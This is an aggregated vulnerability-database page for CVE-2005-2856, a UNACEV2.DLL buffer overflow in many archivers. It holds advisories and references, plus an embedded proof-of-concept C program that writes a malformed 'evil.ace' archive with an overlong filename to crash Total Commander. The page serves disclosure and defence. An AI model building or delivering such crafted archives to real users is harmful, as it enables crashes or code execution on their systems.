CVE-2005-2856
CVSS 7.5
Published: 2005-09-08 06:03:00
Revised: 2016-10-17 23:30:52

[Original] Stack-based buffer overflow in the WinACE UNACEV2.DLL third-party compression utility before 2.6.0.0, as used in multiple products including (1) ALZip 5.51 through 6.11, (2) Servant Salamander 2.0 and 2.5 Beta 1, (3) WinHKI 1.66 and 1.67, (4) ExtractNow 3.x, (5) Total Commander 6.53, (6) Anti-Trojan 5.5.421, (7) PowerArchiver before 9.61, (8) UltimateZip 2.7,1, 3.0.3, and 3.1b, (9) Where Is It (WhereIsIt) 3.73.501, (10) FilZip 3.04, (11) IZArc 3.5 beta3, (12) Eazel 1.0, (13) Rising Antivirus 18.27.21 and earlier, (14) AutoMate 6.1.0.0, (15) BitZipper 4.1 SR-1, (16) ZipTV, and other products, allows user-assisted attackers to execute arbitrary code via a long filename in an ACE archive.


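[CNNVD] Microchip Data Systems ZipTV TZipTV ARJ File Handling Overflow Vulnerability (CNNVD-200509-086)

        ZipTV is a collection of compression/decompression tool components.
        The TZipTV component of ZipTV has a heap overflow vulnerability when listing the files in an ARJ archive. If a user is tricked into extracting a specially crafted ARJ archive containing an overly long ARJ header block, the vulnerability is triggered, leading to arbitrary code execution.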

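- CVSS (Base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CWE (Weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (Affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (Technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2856
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2856
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-086
(Official data source) CNNVD

- Other links and resources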

http://marc.info/?l=bugtraq&m=112621008228458&w=2
(UNKNOWN)  BUGTRAQ  20050908 Secunia Research: ALZip ACE Archive Handling Buffer Overflow
http://securityreason.com/securityalert/49
(UNKNOWN)  SREASON  49
http://securitytracker.com/id?1014863
(UNKNOWN)  SECTRACK  1014863
http://securitytracker.com/id?1015852
(UNKNOWN)  SECTRACK  1015852
http://securitytracker.com/id?1016011
(UNKNOWN)  SECTRACK  1016011
http://securitytracker.com/id?1016012
(UNKNOWN)  SECTRACK  1016012
http://securitytracker.com/id?1016065
(UNKNOWN)  SECTRACK  1016065
http://securitytracker.com/id?1016066
(UNKNOWN)  SECTRACK  1016066
http://securitytracker.com/id?1016088
(UNKNOWN)  SECTRACK  1016088
http://securitytracker.com/id?1016114
(UNKNOWN)  SECTRACK  1016114
http://securitytracker.com/id?1016115
(UNKNOWN)  SECTRACK  1016115
http://securitytracker.com/id?1016177
(UNKNOWN)  SECTRACK  1016177
http://securitytracker.com/id?1016257
(UNKNOWN)  SECTRACK  1016257
http://securitytracker.com/id?1016512
(UNKNOWN)  SECTRACK  1016512
http://www.securityfocus.com/archive/1/archive/1/432357/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060428 Secunia Research: Servant Salamander unacev2.dll Buffer Overflow Vulnerability
http://www.securityfocus.com/archive/1/archive/1/432579/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060501 Secunia Research: WinHKI unacev2.dll Buffer Overflow Vulnerability
http://www.securityfocus.com/archive/1/archive/1/433258/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060508 Secunia Research: Anti-Trojan unacev2.dll Buffer Overflow Vulnerability
http://www.securityfocus.com/archive/1/archive/1/433352/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060509 Secunia Research: Where Is It unacev2.dll Buffer Overflow Vulnerability
http://www.securityfocus.com/archive/1/archive/1/433693/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060511 Secunia Research: UltimateZip unacev2.dll Buffer Overflow Vulnerability
http://www.securityfocus.com/archive/1/archive/1/434011/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060515 Secunia Research: FilZip unacev2.dll Buffer Overflow Vulnerability
http://www.securityfocus.com/archive/1/archive/1/434234/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060517 Secunia Research: IZArc unacev2.dll Buffer Overflow Vulnerability
http://www.securityfocus.com/archive/1/archive/1/434279/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060517 Secunia Research: Eazel unacev2.dll Buffer Overflow Vulnerability
http://www.securityfocus.com/archive/1/archive/1/436639/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060609 Secunia Research: AutoMate unacev2.dll Buffer Overflow Vulnerability
http://www.securityfocus.com/archive/1/archive/1/440303/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060717 Secunia Research: BitZipper unacev2.dll Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/14759
(UNKNOWN)  BID  14759
http://www.securityfocus.com/bid/19884
(UNKNOWN)  BID  19884
http://www.vupen.com/english/advisories/2006/1565
(UNKNOWN)  VUPEN  ADV-2006-1565
http://www.vupen.com/english/advisories/2006/1577
(UNKNOWN)  VUPEN  ADV-2006-1577
http://www.vupen.com/english/advisories/2006/1611
(UNKNOWN)  VUPEN  ADV-2006-1611
http://www.vupen.com/english/advisories/2006/1681
(UNKNOWN)  VUPEN  ADV-2006-1681
http://www.vupen.com/english/advisories/2006/1694
(UNKNOWN)  VUPEN  ADV-2006-1694
http://www.vupen.com/english/advisories/2006/1725
(UNKNOWN)  VUPEN  ADV-2006-1725
http://www.vupen.com/english/advisories/2006/1775
(UNKNOWN)  VUPEN  ADV-2006-1775
http://www.vupen.com/english/advisories/2006/1797
(UNKNOWN)  VUPEN  ADV-2006-1797
http://www.vupen.com/english/advisories/2006/1835
(UNKNOWN)  VUPEN  ADV-2006-1835
http://www.vupen.com/english/advisories/2006/1836
(UNKNOWN)  VUPEN  ADV-2006-1836
http://www.vupen.com/english/advisories/2006/2047
(UNKNOWN)  VUPEN  ADV-2006-2047
http://www.vupen.com/english/advisories/2006/2184
(UNKNOWN)  VUPEN  ADV-2006-2184
http://www.vupen.com/english/advisories/2006/2824
(UNKNOWN)  VUPEN  ADV-2006-2824
http://www.vupen.com/english/advisories/2006/3495
(UNKNOWN)  VUPEN  ADV-2006-3495
http://xforce.iss.net/xforce/xfdb/26116
(UNKNOWN)  XF  servant-salamander-unacev2-bo(26116)
http://xforce.iss.net/xforce/xfdb/26142
(UNKNOWN)  XF  winhki-unacev2-bo(26142)
http://xforce.iss.net/xforce/xfdb/26168
(UNKNOWN)  XF  extractnow-unacev2-ace-bo(26168)
http://xforce.iss.net/xforce/xfdb/26272
(UNKNOWN)  XF  powerarchiver-unacev2-ace-bo(26272)
http://xforce.iss.net/xforce/xfdb/26302
(UNKNOWN)  XF  antitrojan-unacev2-bo(26302)
http://xforce.iss.net/xforce/xfdb/26315
(UNKNOWN)  XF  whereisit-unacev2-bo(26315)
http://xforce.iss.net/xforce/xfdb/26385
(UNKNOWN)  XF  ultimatezip-unacev2-bo(26385)
http://xforce.iss.net/xforce/xfdb/26447
(UNKNOWN)  XF  filzip-unacev2-bo(26447)
http://xforce.iss.net/xforce/xfdb/26479
(UNKNOWN)  XF  eazel-ztvunacev2-bo(26479)
http://xforce.iss.net/xforce/xfdb/26480
(UNKNOWN)  XF  izarc-unacev2-bo(26480)
http://xforce.iss.net/xforce/xfdb/26736
(UNKNOWN)  XF  risingantivirus-unacev2-bo(26736)
http://xforce.iss.net/xforce/xfdb/26982
(UNKNOWN)  XF  automate-unacev2-bo(26982)
http://xforce.iss.net/xforce/xfdb/27763
(UNKNOWN)  XF  bitzipper-unacev2-bo(27763)
http://xforce.iss.net/xforce/xfdb/28787
(UNKNOWN)  XF  tziptv-unacev2-bo(28787)

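- Vulnerability information

Microchip Data Systems ZipTV TZipTV ARJ File Handling Overflow Vulnerability
High risk  Buffer overflow
2005-09-08 00:00:00 2006-09-27 00:00:00
Remote
        ZipTV is a collection of compression/decompression tool components.
        The TZipTV component of ZipTV has a heap overflow vulnerability when listing the files in an ARJ archive. If a user is tricked into extracting a specially crafted ARJ archive containing an overly long ARJ header block, the vulnerability is triggered, leading to arbitrary code execution.

- Announcements and patches

        The vendor has not yet provided a patch or upgrade. We recommend that users of this software keep watching the vendor's home page for the latest version:
        http://www.ziptv.com/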

- Vulnerability information (1633)

Total Commander 6.x (unacev2.dll) Buffer Overflow PoC Exploit (EDBID:1633)
windows dos
2006-04-02 Verified
0 darkeagle
N/A
/*
--
/\
\/	Total Commander unacev2.dll Buffer Overflow PoC Exploit
/\			by Darkeagle of Unl0ck Research Team
\/					http://unl0ck.net
/\	
\/	when file will be created, try to open archive in TotalCmd and then unpack it ;)
/\
\/
--
*/
#include <string.h>
#include <stdio.h>

unsigned char evil_ace[] = 
	"\x29\x8F\x31\x00\x00\x00\x90\x2A\x2A\x41\x43\x45\x2A\x2A\x14\x14" 
	"\x02\x00\x79\xB5\x7F\x34\xFE\xE2\x05\xA5\x00\x00\x00\x00\x16\x2A" 
	"\x55\x4E\x52\x45\x47\x49\x53\x54\x45\x52\x45\x44\x20\x56\x45\x52" 
	"\x53\x49\x4F\x4E\x2A\x7F\x30\x1E\x01\x01\x01\x00\x00\x00\x00\x00" 
	"\x00\x00\x00\x00\x75\xB5\x7F\x34\x20\x00\x00\x00\xFF\xFF\xFF\xFF" 
	"\x00\x03\x0A\x00\x54\x45\xFF\x00\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x2E\x74\x78\x74";


int main()
{
	FILE *ace;
	ace = fopen("evil.ace", "w+b");
	if (ace == NULL) {	/* output file could not be created */
		perror("fopen");
		return 1;
	}
	fwrite(evil_ace, 1, sizeof(evil_ace)-1, ace);
	fclose(ace);
	return 0;

}

// milw0rm.com [2006-04-02]
		

- Vulnerability information (F48377)

secunia-BitZipper.txt (PacketStormID:F48377)
2006-07-20 00:00:00
 
advisory,overflow
CVE-2005-2856

Secunia Research has discovered a vulnerability in BitZipper, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in UNACEV2.DLL when extracting an ACE archive containing a file with an overly long filename. This can be exploited to cause a stack-based buffer overflow when a user extracts a specially crafted ACE archive. BitZipper version 4.1 SR-1 is affected.

====================================================================== 

                    Secunia Research 17/07/2006

       - BitZipper unacev2.dll Buffer Overflow Vulnerability -

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Secunia........................................................8
Verification.........................................................9

====================================================================== 
1) Affected Software 

* BitZipper version 4.1 SR-1.

Other versions may also be affected.

====================================================================== 
2) Severity 

Rating: Moderately Critical
Impact: System Access
Where:  Remote

====================================================================== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in BitZipper, which
can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error in UNACEV2.DLL 
when extracting an ACE archive containing a file with an overly long
filename. This can be exploited to cause a stack-based buffer overflow
when a user extracts a specially crafted ACE archive.

The vulnerability is related to:
SA16479

====================================================================== 
4) Solution 

Do not extract untrusted archives.

====================================================================== 
5) Time Table 

02/05/2006 - Initial vendor notification.
16/05/2006 - Second vendor notification.
16/05/2006 - Initial vendor reply.
17/07/2006 - Public disclosure

====================================================================== 
6) Credits 

Discovered by Secunia Research.

====================================================================== 
7) References

SA16479:
http://secunia.com/advisories/16479/

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2005-2856 for the vulnerability.

====================================================================== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

====================================================================== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-46/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================



    

- Vulnerability information (F47250)

secunia-AutoMate.txt (PacketStormID:F47250)
2006-06-12 00:00:00
 
advisory,overflow
CVE-2005-2856

Secunia Research has discovered a vulnerability in AutoMate version 6.1.0.0, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in UNACEV2.DLL when extracting an ACE archive containing a file with an overly long filename. This can be exploited to cause a stack-based buffer overflow when a user extracts a specially crafted ACE archive.

====================================================================== 

                    Secunia Research 07/06/2006

       - AutoMate unacev2.dll Buffer Overflow Vulnerability -

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Secunia........................................................8
Verification.........................................................9

====================================================================== 
1) Affected Software 

* AutoMate version 6.1.0.0

Other versions may also be affected.

====================================================================== 
2) Severity 

Rating: Less Critical
Impact: System Access
Where:  Remote

====================================================================== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in AutoMate, which
can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error in UNACEV2.DLL 
when extracting an ACE archive containing a file with an overly long
filename. This can be exploited to cause a stack-based buffer overflow
when a user extracts a specially crafted ACE archive.

The vulnerability is related to:
SA16479

Successful exploitation requires that the user is e.g. tricked into
scheduling a task to extract a malicious ACE archive.

====================================================================== 
4) Solution 

The vendor reportedly released a fix on 2006-05-29.

Do not extract untrusted ACE archives.

====================================================================== 
5) Time Table 

02/05/2006 - Initial vendor notification.
09/05/2006 - Initial vendor reply.
16/05/2006 - Vendor reminder.
16/05/2006 - Vendor reply.
30/05/2006 - Vendor reminder.
07/06/2006 - Public disclosure. (No reply from vendor)

====================================================================== 
6) Credits 

Discovered by Secunia Research.

====================================================================== 
7) References

SA16479:
http://secunia.com/advisories/16479/

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2005-2856 for the vulnerability.

====================================================================== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

====================================================================== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-38/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================



    

- Vulnerability information (F46478)

secunia-IZArc.txt (PacketStormID:F46478)
2006-05-22 00:00:00
 
advisory,overflow
CVE-2005-2856

Secunia Research has discovered a vulnerability in IZArc versions 3.5 beta 3, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in UNACEV2.DLL when extracting an ACE archive containing a file with an overly long filename. This can be exploited to cause a stack-based buffer overflow when a user extracts a specially crafted ACE archive.

====================================================================== 

                    Secunia Research 17/05/2006

         - IZArc unacev2.dll Buffer Overflow Vulnerability -

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Secunia........................................................8
Verification.........................................................9

====================================================================== 
1) Affected Software 

* IZArc version 3.5 beta 3.

Other versions may also be affected.

====================================================================== 
2) Severity 

Rating: Moderately Critical
Impact: System Access
Where:  Remote

====================================================================== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in IZArc, which
can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error in UNACEV2.DLL 
when extracting an ACE archive containing a file with an overly long
filename. This can be exploited to cause a stack-based buffer overflow
when a user extracts a specially crafted ACE archive.

The vulnerability is related to:
SA16479

====================================================================== 
4) Solution 

Do not extract untrusted ACE archives.

====================================================================== 
5) Time Table 

04/05/2006 - Initial vendor notification.
16/05/2006 - Second vendor notification.
17/05/2006 - Public disclosure. (No reply from vendor)

====================================================================== 
6) Credits 

Discovered by Secunia Research.

====================================================================== 
7) References

SA16479:
http://secunia.com/advisories/16479/

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2005-2856 for the vulnerability.

====================================================================== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

====================================================================== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-32/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================



    

- Vulnerability information (F46477)

secunia-Eazel.txt (PacketStormID:F46477)
2006-05-22 00:00:00
 
advisory,overflow
CVE-2005-2856

Secunia Research has discovered a vulnerability in Eazel version 1.0, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in ztvunacev2.dll (UNACEV2.DLL) when extracting an ACE archive containing a file with an overly long filename. This can be exploited to cause a stack-based buffer overflow when a user extracts a specially crafted ACE archive.

====================================================================== 

                    Secunia Research 17/05/2006

         - Eazel unacev2.dll Buffer Overflow Vulnerability -

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Secunia........................................................8
Verification.........................................................9

====================================================================== 
1) Affected Software 

* Eazel version 1.0.

Other versions may also be affected.

====================================================================== 
2) Severity 

Rating: Moderately Critical
Impact: System Access
Where:  Remote

====================================================================== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Eazel, which
can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error in ztvunacev2.dll
(UNACEV2.DLL) when extracting an ACE archive containing a file with an
overly long filename. This can be exploited to cause a stack-based
buffer overflow when a user extracts a specially crafted ACE archive.

The vulnerability is related to:
SA16479

====================================================================== 
4) Solution 

Do not extract untrusted ACE archives.

====================================================================== 
5) Time Table 

03/05/2006 - Initial vendor notification.
16/05/2006 - Second vendor notification.
17/05/2006 - Public disclosure. (No reply from vendor)

====================================================================== 
6) Credits 

Discovered by Secunia Research.

====================================================================== 
7) References

SA16479:
http://secunia.com/advisories/16479/

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2005-2856 for the vulnerability.

====================================================================== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

====================================================================== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-33/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================



    

- Vulnerability information (F46449)

secunia-FilZip.txt (PacketStormID:F46449)
2006-05-22 00:00:00
 
advisory,overflow
CVE-2005-2856

Secunia Research has discovered a vulnerability in FilZip, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in UNACEV2.DLL when extracting an ACE archive containing a file with an overly long filename. This can be exploited to cause a stack-based buffer overflow when a user extracts a specially crafted ACE archive. Version 3.04 is affected. Earlier versions may also be affected.

====================================================================== 

                    Secunia Research 15/05/2006

       - FilZip unacev2.dll Buffer Overflow Vulnerability -

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Secunia........................................................8
Verification.........................................................9

====================================================================== 
1) Affected Software 

* FilZip version 3.04.

Other versions may also be affected.

====================================================================== 
2) Severity 

Rating: Moderately Critical
Impact: System Access
Where:  Remote

====================================================================== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in FilZip, which
can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error in UNACEV2.DLL 
when extracting an ACE archive containing a file with an overly long
filename. This can be exploited to cause a stack-based buffer overflow
when a user extracts a specially crafted ACE archive.

The vulnerability is related to:
SA16479

====================================================================== 
4) Solution 

Do not extract ACE archives from untrusted sources.

====================================================================== 
5) Time Table 

26/04/2006 - Initial vendor notification.
27/04/2006 - Second vendor notification.
11/05/2006 - Third vendor notification.
15/05/2006 - Public disclosure. (No reply from vendor)

====================================================================== 
6) Credits 

Discovered by Secunia Research.

====================================================================== 
7) References

SA16479:
http://secunia.com/advisories/16479/

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2005-2856 for the vulnerability.

====================================================================== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

====================================================================== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-30/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================



    

- Vulnerability information (F46227)

secunia-anti.txt (PacketStormID:F46227)
2006-05-09 00:00:00
 
advisory,overflow,trojan
CVE-2005-2856

Secunia Research has discovered a vulnerability in Anti-Trojan version 5.5.421, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in UNACEV2.DLL when extracting an ACE archive containing a file with an overly long filename. This can be exploited to cause a stack-based buffer overflow when a user scans a specially crafted ACE archive.

====================================================================== 

                    Secunia Research 08/05/2006

      - Anti-Trojan unacev2.dll Buffer Overflow Vulnerability -

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Secunia........................................................8
Verification.........................................................9

====================================================================== 
1) Affected Software 

* Anti-Trojan 5.5.421. 

Prior versions may also be affected.

====================================================================== 
2) Severity 

Rating: Highly Critical
Impact: System Access
Where:  Remote

====================================================================== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Anti-Trojan,
which can be exploited by malicious people to compromise a user's
system.

The vulnerability is caused due to a boundary error in UNACEV2.DLL
when extracting an ACE archive containing a file with an overly long
filename. This can be exploited to cause a stack-based buffer overflow
when a user scans a specially crafted ACE archive.

The vulnerability is related to:
SA16479

Successful exploitation requires that the "Search in archive files"
option is enabled.

====================================================================== 
4) Solution 

Version 5.5 is no longer supported and no fix is available. 

The vendor recommends existing users to upgrade to the successor
product "a-squared Anti-Malware".

====================================================================== 
5) Time Table 

08/05/2006 - Initial vendor notification.
08/05/2006 - Initial vendor reply.
08/05/2006 - Public disclosure.

====================================================================== 
6) Credits 

Discovered by Secunia Research.

====================================================================== 
7) References

SA16479:
http://secunia.com/advisories/16479/

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2005-2856 for the vulnerability.

====================================================================== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

====================================================================== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-27/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================



    

- Vulnerability Information

19224
WinACE UNACEV2.DLL ACE Archive Filename Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- Vulnerability Description

A remote overflow exists in the WinACE UNACEV2 library. The UNACE library used in multiple products fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted ACE archive containing a compressed file with an overly long filename, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2005-09-07 2005-08-22
Unknown Unknown

- Solution

Consult your individual vendor for solution information.

- Related References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

Multiple Vendor UNACEV2 Archive File Name Buffer Overflow Vulnerability
Boundary Condition Error 14759
Yes No
2005-09-07 12:00:00 2006-09-07 09:53:00
Discovery is credited to Tan Chew Keong.

- Affected Software Versions

WinHKI WinHKI 1.67
WinHKI WinHKI 1.66
Where Is It Soft Where Is It 3.73.501
UltimateZip UltimateZip 3.0.3
UltimateZip UltimateZip 2.7.1
UltimateZip UltimateZip 3.1b
Rising Antivirus International Rising Antivirus 2006 18.27.21
Rising Antivirus International Rising Antivirus 2006 18.25.40
Rising Antivirus International Rising Antivirus 2006 18.25.30
Rising Antivirus International Rising Antivirus 2006 18.24.10
Network Automation AutoMate 6.1 .0
Nathan Moinvaziri ExtractNow 3.60
Microchip Data Systems ZipTV for Delphi 7 2006.1.26
Microchip Data Systems ZipTV for C++ Builder 2006.1.16
Ivan Zahariev IZArc 3.5 beta 3
FilZip FilZip 3.04
Eazel Eazel 1.0
ConeXware PowerArchiver 9.60
Bitberry Software BitZipper 4.1 SR-1
ALTools ALZip 6.11 (Korean)
ALTools ALZip 6.1 beta
ALTools ALZip 6.0 3 (English)
ALTools ALZip 5.52
ALTools ALZip 5.51
a-squared Anti-Trojan 5.5.421

- Unaffected Software Versions

WinHKI WinHKI 1.68
Where Is It Soft Where Is It 3.73.505
Rising Antivirus International Rising Antivirus 2006 18.29.12
Nathan Moinvaziri ExtractNow 4.16
ConeXware PowerArchiver 9.61
ALTools ALZip 6.12 (Korean)
ALTools ALZip 6.1

- Vulnerability Discussion

Multiple products are prone to a buffer overflow when handling ACE archives that contain files with overly long names.

This may be exploited to execute arbitrary code in the context of the user who is running the application. The vulnerability is considered remotely exploitable in nature because malicious ACE archives will likely originate from an external, untrusted source.

- Exploit

Currently we are not aware of any exploits for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com

- Solution

This issue has been addressed in ALZip 6.1 for English and international versions other than Korean. ALZip 6.12 (Korean) addresses the Korean-language release.

This issue has been addressed in WinHKI version 1.68.

This issue is not present in the 4.x series of ExtractNow.

NOTE: a-squared Anti-Trojan is no longer supported. Users of affected Anti-Trojan products are encouraged to upgrade to its successor software, Anti-Malware.

ConeXware PowerArchiver version 9.61 (and later) contains a fix for this issue.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please email us at: vuldb@securityfocus.com.


WinHKI WinHKI 1.66

Nathan Moinvaziri ExtractNow 3.60

WinHKI WinHKI 1.67

Where Is It Soft Where Is It 3.73.501

ALTools ALZip 5.51

ALTools ALZip 5.52

ALTools ALZip 6.0 3 (English)

ALTools ALZip 6.1 beta

ALTools ALZip 6.11 (Korean)

- Related References

 

 
